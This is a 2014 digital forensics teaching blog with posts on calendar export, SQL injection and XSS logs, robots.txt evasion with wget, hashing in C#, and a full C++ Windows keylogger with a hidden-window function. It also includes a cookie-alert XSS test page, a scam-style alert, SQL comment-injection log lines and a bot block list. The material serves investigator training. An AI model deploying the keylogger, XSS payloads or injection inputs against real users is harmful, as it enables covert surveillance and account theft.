Friday, November 21, 2014

Back to basics - Develop Forensic Analyst Mindset

This is a must watch video and must play game in order to even get started in developing an investigative mindset that is essential in incident response and cybersecurity investigations.

You can not just read about cybersecurity, you need to start developing skills, but will see that even basic skills an be challenging as you start using those skills in real environments.

This video will also show you that basic encoding can also be used by actual applications to store passwords.  It will also show you how Base64 works and how important log analysis is in this field.

http://youtu.be/9sGhmYlBrXU


Tuesday, October 28, 2014

Back to basics - Convert ICS to HTML and CSV

The discreet nature of calendar entries make seeing the over all picture or in investigations seeing a pattern of events is very difficult.  We need to be able to see the events in chronological order in a single document that we can use as a report or chart the values for easy understanding of events for non-technical professionals.

One of the most useful and versatile applications when it comes to Internet communication.  In this blog, I will explore the capability of this tool to convert .ics files, that is the only format that Google Calendar exports.

I also created a video to accommodate this blog post: http://youtu.be/WbBRhP6VXbs

So, in order to follow this process, you need to download and install Thunderbird, https://www.mozilla.org/en-US/thunderbird/download.

Login to your Google Calendar and create a new calendar.

Add new schedules to the new calendar and export the calendar as an .ics file.  Notice in the exported .ics file below the date and time stamps are not very user friendly to read, so it might need to be manually converted to make sense to non-technical professionals.  On the other hand, the HTML and CSV exported files below show the date and time stamps displayed in user friendly format that is easy to report and charted for easy interpretation without any manual conversion or risk of human error.


Import the .ics file into Thunderbird's Lightning add-on, that adds the calendar feature to Thunderbird.

Export the calendar as .ics, .html, or .csv format.


The HTML document can be directly used as a report, but the CSV format gives more flexibility to analyze the data or create chart to show clear patterns of events. 



Thus, digital forensics is about pattern recognition, but pattern can not emerge in some cases in its native format.  So, we need to focus on software capability to import certain file types and explore applications capability to export the data into different format that can aid our analysis and help identify patterns to solve cases.  

Monday, October 27, 2014

Back to basics - SQL and XSS

This post is accompanied by a video explaining this process and you can do about it.

http://youtu.be/-W3efiMT8H0

Sample web page to test Javascipts in browser.  Save the following code in a text file, name it test.html ad open it in your browser to see what it does.

<HTML>
<HEAD>>
              <script> window.open('http://zoltandfw.blogspot.com/','_blank')</script>
              <script> alert(document.cookie)</script>
              <script> alert("Your account has been compromised, please call (111)222-3333 to report!!!")               </script>
</HEAD>
<BODY>
              Just a test for JavaScripts
</BODY>
</HTML>

Sample log file entries showing details on what information might be collected in log files to investigate after the fact or monitor for real-time response.  

141027  7:39:45  122 Connect root@localhost on 
 122 Init DB badbank
 122 Query SELECT userid, accountnumber FROM badbank_accounts WHERE username='zoltan' AND password='9f1c050c2b226c2154d17a3ff9a602f6'
 122 Quit
141027  7:41:55  123 Connect root@localhost on 
 123 Init DB badbank
 123 Query SELECT userid, accountnumber FROM badbank_accounts WHERE username='zoltan' -- ' AND password='d41d8cd98f00b204e9800998ecf8427e'
 123 Quit
141027  8:00:30  124 Connect root@localhost on 
 124 Init DB badbank
 124 Quit
 125 Connect root@localhost on 
 125 Init DB badbank
 125 Quit
141027  8:42:47  126 Connect ODBC@localhost as  on 
 126 Query select @@version_comment limit 1
141027  8:42:55  126 Query show databases
141027  8:43:26  126 Query SELECT DATABASE()
 126 Init DB Access denied for user ''@'localhost' to database 'badbank'
141027  8:43:41  126 Quit

...

141027  9:04:20  130 Query select * from badbank_transactions
141027  9:05:22  213 Connect root@localhost on 
 213 Init DB badbank
 213 Query SELECT balance FROM badbank_accounts WHERE userid=61
 213 Quit
141027  9:05:37  214 Connect root@localhost on 
 214 Init DB badbank
 214 Query SELECT balance FROM badbank_accounts WHERE userid=61
 214 Query SELECT userid FROM badbank_accounts WHERE username='victim1'
 214 Query UPDATE badbank_accounts SET balance=balance-1 WHERE userid=61
 214 Query UPDATE badbank_accounts SET balance=balance+1 WHERE userid=60
 214 Query INSERT INTO badbank_transactions (userid,time,withdrawn,transactor,transfernote) VALUES (61,NOW(),1,60,'<script> alert(document.cookie)</script>')
 214 Query INSERT INTO badbank_transactions (userid,time,deposited,transactor,transfernote) VALUES (60,NOW(),1,61,'<script> alert(document.cookie)</script>')
 214 Quit
141027  9:05:41  215 Connect root@localhost on 
 215 Init DB badbank
 215 Quit
 216 Connect root@localhost on 
 216 Init DB badbank
 216 Quit

Sunday, October 26, 2014

Back to Basics - Information Assurance - Robots.txt

Note: If you like these blog posts, please click the +1 !

In some cases, you might need to, so called, crawl a web site to gather keywords or email addresses. Web sites can utilize the use of robots.txt files to prevent simple automated crawling of the entire website or part of it. The robots.txt file gives instructions to web robots about what not allowed on the web site using the Robots Exclusion Protocol. So, if a website contains a robots.txt like:

User-Agent: * 
Disallow: / 

This robots.txt will disallow all robots from visiting all pages on the web site. So, if a robot would try to visit a web site http://www.domain.topdomain/examplepage.html, then robots.txt in the root of the website http://www.domain.topdomain/robots.txt will not permit the robot to access the website. The robots.txt file can be ignored by many web crawlers, so it should not be used as a security measure to hide information. We should also be able to ignore such a simple security measure to investigate or to test web site security. I have mentioned in previous web posts the tool called wget that is a very useful tool to download a web page, website, or malware from the command line. This simple tool can also be configured to ignore the robots.txt file, but by default, it respects it, so you need to specifically tell the tool to ignore is directions.

wget -e robots=off --wait 1 -m http://domain.topdomain 
FINISHED --2014-10-26 11:12:36-- 
Downloaded: 35 files, 22M in 19s (1.16 MB/s) 

While not using the robots=off option will result in the following results.

wget -m http://domain.topdomain 
FINISHED --2014-10-26 11:56:53-- 
Downloaded: 1 files, 5.5K in 0s (184 MB/s)

It is clear to see in this example that we would have missed 34 files by not being familiar with this simple file and its purpose.

Using "User-Agent: * " is a great option to block robots of unknown name blocked unless the robots use other methods to get to the website contents. Let's try and see what will happen if we use wget without robots=off.

 
As you can see the User-Agent is set to wget/1.11( default Wget/version ), so as you can see in the list below, a robots.txt with the content list below would catch this utility and prevent it from getting the website contents.

Note: The orange highlighted three packets are the 3-way handshake, so the request for the resources with the User-agent settings is the fist packet following the three-way handshake.  That might be a good pattern for alarm settings.

wget also has an option to change the user-agent default string to anything the user wants to use.

wget --user-agent=ZOLTAN -m http://domain.topdomain 



As you can see in the packet capture, the user-agent was overwritten as the option promised, but the website still only allowed a single file download due to User-agent: * that captured the unknown string.  So, robots.txt can help protecting the website to a certain extent, but the -e robots=off option did get the whole website content even though the packet contained an unmodified User-agent settings.

robots.txt can have specific contents to keep unsafe robots away from a web site or to provide basic protection from these "pests":   ( This list is not exhaustive, but it can be a good source to learn about malicious packet contents and a good resource for further reading on each one of these software tools. )

User-agent: Aqua_Products
Disallow: /

User-agent: asterias
Disallow: /

User-agent: b2w/0.1
Disallow: /

User-agent: BackDoorBot/1.0
Disallow: /

User-agent: Black Hole
Disallow: /

User-agent: BlowFish/1.0
Disallow: /

User-agent: Bookmark search tool
Disallow: /

User-agent: BotALot
Disallow: /

User-agent: BuiltBotTough
Disallow: /

User-agent: Bullseye/1.0
Disallow: /

User-agent: BunnySlippers
Disallow: /

User-agent: Cegbfeieh
Disallow: /

User-agent: CheeseBot
Disallow: /

User-agent: CherryPicker
Disallow: /

User-agent: CherryPicker /1.0
Disallow: /

User-agent: CherryPickerElite/1.0
Disallow: /

User-agent: CherryPickerSE/1.0
Disallow: /

User-agent: CopyRightCheck
Disallow: /

User-agent: cosmos
Disallow: /

User-agent: Crescent
Disallow: /

User-agent: Crescent Internet ToolPak HTTP OLE Control v.1.0
Disallow: /

User-agent: DittoSpyder
Disallow: /

User-agent: EmailCollector
Disallow: /

User-agent: EmailSiphon
Disallow: /

User-agent: EmailWolf
Disallow: /

User-agent: EroCrawler
Disallow: /

User-agent: ExtractorPro
Disallow: /

User-agent: FairAd Client
Disallow: /

User-agent: Flaming AttackBot
Disallow: /

User-agent: Foobot
Disallow: /

User-agent: Gaisbot
Disallow: /

User-agent: GetRight/4.2
Disallow: /

User-agent: grub
Disallow: /

User-agent: grub-client
Disallow: /

User-agent: Harvest/1.5
Disallow: /

User-agent: hloader
Disallow: /

User-agent: httplib
Disallow: /

User-agent: humanlinks
Disallow: /

User-agent: ia_archiver
Disallow: /

User-agent: ia_archiver/1.6
Disallow: /

User-agent: InfoNaviRobot
Disallow: /

User-agent: Iron33/1.0.2
Disallow: /

User-agent: JennyBot
Disallow: /

User-agent: Kenjin Spider
Disallow: /

User-agent: Keyword Density/0.9
Disallow: /

User-agent: larbin
Disallow: /

User-agent: LexiBot
Disallow: /

User-agent: libWeb/clsHTTP
Disallow: /

User-agent: LinkextractorPro
Disallow: /

User-agent: LinkScan/8.1a Unix
Disallow: /

User-agent: LinkWalker
Disallow: /

User-agent: LNSpiderguy
Disallow: /

User-agent: lwp-trivial
Disallow: /

User-agent: lwp-trivial/1.34
Disallow: /

User-agent: Mata Hari
Disallow: /

User-agent: Microsoft URL Control
Disallow: /

User-agent: Microsoft URL Control - 5.01.4511
Disallow: /

User-agent: Microsoft URL Control - 6.00.8169
Disallow: /

User-agent: MIIxpc
Disallow: /

User-agent: MIIxpc/4.2
Disallow: /

User-agent: Mister PiX
Disallow: /

User-agent: moget
Disallow: /

User-agent: moget/2.1
Disallow: /

User-agent: mozilla/4
Disallow: /

User-agent: Mozilla/4.0 (compatible; BullsEye; Windows 95)
Disallow: /

User-agent: Mozilla/4.0 (compatible; MSIE 4.0; Windows 2000)
Disallow: /

User-agent: Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)
Disallow: /

User-agent: Mozilla/4.0 (compatible; MSIE 4.0; Windows 98)
Disallow: /

User-agent: Mozilla/4.0 (compatible; MSIE 4.0; Windows ME)
Disallow: /

User-agent: Mozilla/4.0 (compatible; MSIE 4.0; Windows NT)
Disallow: /

User-agent: Mozilla/4.0 (compatible; MSIE 4.0; Windows XP)
Disallow: /

User-agent: mozilla/5
Disallow: /

User-agent: MSIECrawler
Disallow: /

User-agent: NetAnts
Disallow: /

User-agent: NetMechanic
Disallow: /

User-agent: NICErsPRO
Disallow: /

User-agent: Offline Explorer
Disallow: /

User-agent: Openbot
Disallow: /

User-agent: Openfind
Disallow: /

User-agent: Openfind data gathere
Disallow: /

User-agent: Oracle Ultra Search
Disallow: /

User-agent: PerMan
Disallow: /

User-agent: ProPowerBot/2.14
Disallow: /

User-agent: ProWebWalker
Disallow: /

User-agent: psbot
Disallow: /

User-agent: Python-urllib
Disallow: /

User-agent: QueryN Metasearch
Disallow: /

User-agent: Radiation Retriever 1.1
Disallow: /

User-agent: RepoMonkey
Disallow: /

User-agent: RepoMonkey Bait & Tackle/v1.01
Disallow: /

User-agent: RMA
Disallow: /

User-agent: searchpreview
Disallow: /

User-agent: SiteSnagger
Disallow: /

User-agent: SpankBot
Disallow: /

User-agent: spanner
Disallow: /

User-agent: suzuran
Disallow: /

User-agent: Szukacz/1.4
Disallow: /

User-agent: Teleport
Disallow: /

User-agent: TeleportPro
Disallow: /

User-agent: Telesoft
Disallow: /

User-agent: The Intraformant
Disallow: /

User-agent: TheNomad
Disallow: /

User-agent: TightTwatBot
Disallow: /

User-agent: Titan
Disallow: /

User-agent: toCrawl/UrlDispatcher
Disallow: /

User-agent: True_Robot
Disallow: /

User-agent: True_Robot/1.0
Disallow: /

User-agent: turingos
Disallow: /

User-agent: URL Control
Disallow: /

User-agent: URL_Spider_Pro
Disallow: /

User-agent: URLy Warning
Disallow: /

User-agent: VCI
Disallow: /

User-agent: VCI WebViewer VCI WebViewer Win32
Disallow: /

User-agent: Web Image Collector
Disallow: /

User-agent: WebAuto
Disallow: /

User-agent: WebBandit
Disallow: /

User-agent: WebBandit/3.50
Disallow: /

User-agent: WebCopier
Disallow: /

User-agent: WebEnhancer
Disallow: /

User-agent: WebmasterWorldForumBot
Disallow: /

User-agent: WebSauger
Disallow: /

User-agent: Website Quester
Disallow: /

User-agent: Webster Pro
Disallow: /

User-agent: WebStripper
Disallow: /

User-agent: WebZip
Disallow: /

User-agent: WebZip/4.0
Disallow: /

User-agent: Wget
Disallow: /

User-agent: Wget/1.5.3
Disallow: /

User-agent: Wget/1.6
Disallow: /

User-agent: WWW-Collector-E
Disallow: /

User-agent: Xenu's
Disallow: /

User-agent: Xenu's Link Sleuth 1.1c
Disallow: /

User-agent: Zeus
Disallow: /

User-agent: Zeus 32297 Webster Pro V2.9 Win32
Disallow: /

User-agent: Zeus Link Scout
Disallow: /

Saturday, October 25, 2014

Back to Basics - Intellectual Property

This post is about practicing critical thinking when it comes to intellectual property cases and to track down old or previous websites using copyright material. We can also us this technique to locate images where only the portion of the image is used or relevant to the case.


Tuesday, October 21, 2014

Code2Learn - Keylogger

Now, this example is for educational purposes only and you should not run this code on your own machine if you are not familiar with all of the lines in this code.

Keyloggers have been viewed as something only people with bad intention write, but it is nothing more than monitoring the keys that are pressed on the keyboard and saving them in a file for later review.

In investigation, you might have to look at code and identify basic pattern in order to "guess" what the code is designed to do.  In this example, you can see the basic feature of a keylogger and I hope it will teach you that simple code like this can be added to any code to accomplish the same.  Thus, downloading so called pirated and illegal or cracked version of applications can contain this type of added code.  For the user, the functionality of the application will not visibly change, but the application might have "added features" that users are not aware of.

In many cases, executable analysis is just a simple strings search that can reveal keywords compiled inside the executable that can be googled and lead to understand some of the features of the program.  We can see the message and a clear text of the file that is used to collect the captured keystrokes.  If the code would connect to a server on the Internet, we might even see the URL or the IP address of the server the data is exfiltrated to.

So, this case a simple keyword search on the executable reveals a portion of my code, thus the intended purpose.  So, code might be analyzed by non-programmers and still have a successful heuristic conclusion of what a code or a portion of the code is designed to do.



Warning: You will need to look at your taskmanager in order to stop this program from running.

#include<iostream>
#include<windows.h>
#include<winuser.h>
#include<fstream>
#include <string>

using namespace std;
int Save(int key_stroke, string file);
void Stealth();

int main(){
//Stealth();

char i;

        cout << "This is my example of a keylogger - Zoltan" << endl;

while (1){
for (i = 8; i <= 190; i++){
if (GetAsyncKeyState(i) == -32767)
Save(i, "collect.txt");
      }
      }
return 0;
}

int Save(int key_stroke, string file){
if ((key_stroke == 1) || (key_stroke == 2))
return 0;

ofstream outFile;
char pressed;
pressed = key_stroke;
outFile.open(file, std::fstream::app);
cout << VK_OEM_PERIOD << endl;
outFile << "\n";
switch (key_stroke){
case 8:
outFile << "[BACKSPACE]";
case 13:
outFile << " ";
case  VK_OEM_PERIOD:  //same as 190
outFile << ".";
case VK_TAB:
outFile << "[TAB]";
case VK_SHIFT:
outFile << "[SHIFT]";
case VK_CONTROL:
outFile << "[CONTROL]";
case VK_ESCAPE:
outFile << "[ESCAPE]";
case VK_END:
outFile << "[END]";
case VK_LEFT:
outFile << "[LEFT]";
case VK_UP:
outFile << "[UP]";
case VK_RIGHT:
outFile << "[RIGHT]";
case VK_DOWN:
outFile << "[DOWN]";
case VK_HOME:
outFile << "[HOME]";
case 110:
outFile << ".";
default:
outFile << pressed;
outFile.close();
}

return 0;
}

void Stealth(){
HWND stealth;
AllocConsole();
stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(stealth, 0);
}


Code2Learn - Hashing

One of the most basic concept we learn in digital forensics is to ensure our evidence is not changed after acquisition is hashing.  Hashing helps verify the integrity of the data and helps reduce the dataset by identifying known good files.  Hashes can also identify known "bad" data or partial hashes can identify data that are close enough to investigate further for relevance.  Of course, hashes are also used to store passwords for authentication.  There are many algorithms available, but each algorithm must work exactly the same in software implementations.

When using libraries and third party implementations, you still need to test and validate if the implementation works are designed and implemented properly.

The following is an implementation using third party library:

using System;
using XCrypt;
//http://www.codeproject.com/Articles/483490/XCrypt-Encryption-and-decryption-class-wrapper
//Click to download source "Download source code"
//Click on Project -> Add Reference -> navigate to where you have extracted XCrypt.dll

namespace hashMD5
{
    class Program
    {
        static void Main(string[] args)
        {
            XCryptEngine encrypt = new XCryptEngine();
            encrypt.InitializeEngine(XCryptEngine.AlgorithmType.MD5);
            Console.WriteLine("Enter string to hash:");
            string inText = Console.ReadLine();
            string hashText = encrypt.Encrypt(inText);
            Console.WriteLine("Input: {0}\r\nHash: {1}", inText, hashText);
            byte[] temp=GetBytes(hashText);  //for debugging to see each byte value
            Console.ReadLine();

        }
        static byte[] GetBytes(string str)
        {
            byte[] bytes = new byte[str.Length * sizeof(char)];
            System.Buffer.BlockCopy(str.ToCharArray(), 0, bytes, 0, bytes.Length);
            return bytes;
        }
    }
}

Running the code results in the following output.

Enter string to hash:
Richland College
Input: Richland College
Hash: zlC4yZP3XqYqqboh5Lv4IA== 

The output looks strange and more like Base64 than MD5.  We can place break points in the code and monitor for the actual byte values to see the results to see if it is even close to the actual solution.


We can see the hash values are 122, 0 , 108, 0 ...

Now, let see another program implementation of MD5:

using System;
using System.Collections.Generic;
using System.Text;
using System.Security.Cryptography;

namespace anotherHashMD5SHA1
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("Enter an message: ");
            string message = Console.ReadLine();
            System.Text.ASCIIEncoding encoding = new System.Text.ASCIIEncoding();
            MD5 md5 = new MD5CryptoServiceProvider();
            SHA1 sha1 = new SHA1CryptoServiceProvider();
            byte[] messageBytes = encoding.GetBytes(message);
            byte[] hashmessage = md5.ComputeHash(messageBytes);
            string stringMD5 = ByteToString(hashmessage);
            hashmessage = sha1.ComputeHash(hashmessage);
            string stringSHA1 = ByteToString(hashmessage);
            Console.WriteLine("MD5: {0}\r\nSHA-1: {1}", stringMD5, stringSHA1);
//Console.WriteLine("MD5: {0}\r\nSHA-1: {1}",System.Text.Encoding.Default.GetString(hashmessage), stringSHA1);
            Console.ReadLine();

        }
        public static string ByteToString(byte[] buff)
        {
            string sbinary = "";
            for (int i=0; i < buff.Length; i++)
            {
                sbinary += buff[i].ToString("X2");
            }
            return (sbinary);
        }
    }
}

And the output of this code is as follows,

Enter an message:
Richland College
MD5: CE50B8C993F75EA62AA9BA21E4BBF820
SHA-1: B3A6FC316A94949871594C633C8977D28C70E8B7

So, we also need to see what the resulting byte values are for the hash value in order to see if we just have different encoding of the same byte values displayed and the results are really the same or not.


No, we do not have the same byte values, this one gives us 206, 80, 184, 201, ..., so witch one do we trust and use in our code?

You can use a few IT tools to see what the results of those tools will be.  I recommend HashOnClick.
http://www.2brightsparks.com/onclick/hoc.html

You can create a simple text file, in this case, I used the same text like I used with tool, "Richland College".  


CE50B8C993F75EA62AA9BA21E4BBF820 testfile.txt

The results show the same value as the second code sample, so the second code sample should be implemented.

So, as you can see, there are many implementations of the same algorithm and programmers should use libraries and code from others as much as possible to increase productivity and reduce development time, but only responsible code selection can lead to meaningful and more secure code.  Maybe secure coding should have a prerequisite of knowing IT tools and understanding what we expect tools to do before we try to implement code by compiling and "crossing fingers".